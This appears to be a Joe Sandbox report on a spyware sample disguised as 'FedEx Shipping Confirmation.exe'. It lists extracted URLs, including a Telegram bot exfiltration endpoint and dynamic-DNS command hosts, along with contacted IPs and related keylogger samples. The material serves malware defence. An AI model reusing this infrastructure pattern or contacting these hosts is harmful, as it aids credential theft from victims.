https://reallyfreegeoip.org/xml/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F5F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://beta.visualstudio.net/net/sdk/feedback.asp	FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070541000.00000020.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.00000000331BE000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.office.com/office/url/setupMicrosoft	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.eicar.org/eicar.com	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.office.com/office/url/setup	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packetstormsecurity.com/files/download/22459/BIOS320.EXE	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=autoit	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/?ms.officeurl=setupMicrosoft	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	FedEx Shipping Confirmation.exe	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.eicar.org/eicar.com.txt/	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FD9000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=eicar	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.eicar.org/eicar.com/	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FD9000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/setup	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://office.com/setupMicrosoft	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/site/autoit/downloads/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.eicar.org/download-anti-malware-testfile/Download	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FD9000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.eicar.org/download-anti-malware-testfile/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/setupMicrosoft	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packetstormsecurity.com/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en(	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.000000003317D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.eicar.org/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/site/autoit/downloads/AutoIt	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F5F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	FedEx Shipping Confirmation.exe, 00000003.00000002.8128175078.00000000356F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packetstormsecurity.com/files/22459/BIOS320.EXE.html	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/	FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.eicar.org/eicar.com.txt	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/site/autoit/downloads/7	FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.153.208.178	rabtbts.nl	Reserved	32875	VIRPUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1499874
Start date and time:	2024-08-27 18:02:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FedEx Shipping Confirmation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/13@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 84% Number of executed functions: 152 Number of non-executed functions: 132
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, UserOOBEBroker.exe
Execution Graph export aborted for target FedEx Shipping Confirmation.exe, PID 3660 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: FedEx Shipping Confirmation.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	PO_111234242 6553432.exe	Get hash	malicious	Xeno Stealer	Browse
	Remesas Aceptadas.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	factura n#U00famero 55242.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	FACTURA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	memreduct.exe	Get hash	malicious	Blank Grabber	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Nakliye belgeleri.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.67.152	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	HSBC Advice_ACH Credit.com.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Quotation No.VFLOIPS31052024-1_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Order 8391-6.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Company Profile.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	rCompanyProfile.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SecuriteInfo.com.Win32.SuspectCrc.2428.21334.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
193.122.6.168	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO-890.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	P.O_23514.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Order Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	8468281651.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	invoice and packing list.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Vessel particulars.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	kgMdslznpG.hta	Get hash	malicious	Cobalt Strike, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Remesas Aceptadas.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	factura n#U00famero 55242.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	FACTURA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Nakliye belgeleri.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Request for Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
reallyfreegeoip.org	Remesas Aceptadas.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	factura n#U00famero 55242.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	FACTURA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Nakliye belgeleri.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Request for Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
api.telegram.org	PO_111234242 6553432.exe	Get hash	malicious	Xeno Stealer	Browse	149.154.167.220
	Remesas Aceptadas.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	factura n#U00famero 55242.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	FACTURA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	memreduct.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nakliye belgeleri.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Remesas Aceptadas.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	factura n#U00famero 55242.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Nakliye belgeleri.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SOA-Al Daleel -Star Electromechanical.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	GP Design INV20230103 $68,320.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	GP Design INV20230103 $68,320.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
TELEGRAMRU	PO_111234242 6553432.exe	Get hash	malicious	Xeno Stealer	Browse	149.154.167.220
	Remesas Aceptadas.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	factura n#U00famero 55242.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	FACTURA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	memreduct.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nakliye belgeleri.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	ocedures.msg	Get hash	malicious	Unknown	Browse	104.17.25.14
	Smeg SignRequest.pdf	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	PO_111234242 6553432.exe	Get hash	malicious	Xeno Stealer	Browse	104.26.13.205
	RFQ-MR-24-09101 .xls	Get hash	malicious	Unknown	Browse	162.159.134.233
	https://downloads-global.3cx.com/downloads/3CXPhoneSystem18.exe	Get hash	malicious	Unknown	Browse	104.18.35.19
